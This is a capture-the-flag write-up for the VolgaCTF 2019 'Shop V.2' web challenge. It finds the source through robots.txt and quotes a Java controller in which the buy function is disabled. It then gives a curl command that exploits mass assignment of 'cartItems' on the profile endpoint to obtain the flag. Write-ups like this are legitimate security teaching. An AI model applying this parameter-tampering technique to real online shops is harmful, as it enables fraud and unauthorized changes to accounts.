# Shop V.2

## Challenge description
This is the sequel of [Shop](https://github.com/salted-crhackers/writeups/tree/master/2019/volgactf-qualifier/shop), where some things have been changed.

## Obtaining the code - robots.txt

Just like we did for Shop, we look at `/robots.txt` and get the [WAR archive](https://github.com/salted-crhackers/writeups/raw/master/2019/volgactf-qualifier/shop-v2/shop-1.0.1.war):
```
Disallow: /shop-1.0.1.war
```

## Analyzing the code

[The code](https://github.com/salted-crhackers/writeups/blob/master/2019/volgactf-qualifier/shop-v2/ShopController.java) is pretty much identical. We notice that the buy functionality has been removed though:
```
@RequestMapping({"/buy"})
public String buy(@RequestParam Integer productId, @ModelAttribute("user") User user, RedirectAttributes redir, HttpServletRequest request) {
	HttpSession session = request.getSession();
	if (session.getAttribute("user_id") == null) {
		return "redirect:index";
	} else {
		redir.addFlashAttribute("message", "Too easy");
		return "redirect:index";
	}
}
```
This means that we cannot buy any item, and also that we can not persist changes made to our `User` in the model.

## Solution

The "simpler solution" from Shop will not work, as it leverages the buy functionality to alter our balance. Luckily, the first solution I found for Shop works just fine if we skip the buy and alter the cart directly in the profile page.
```
curl --verbose --data 'cartItems[0].id=4' -H "Cookie: JSESSIONID=012B12A6BE1A47EE411E52D61EA37624" http://shop2.q.2019.volgactf.ru/profile
```
The flag is served.
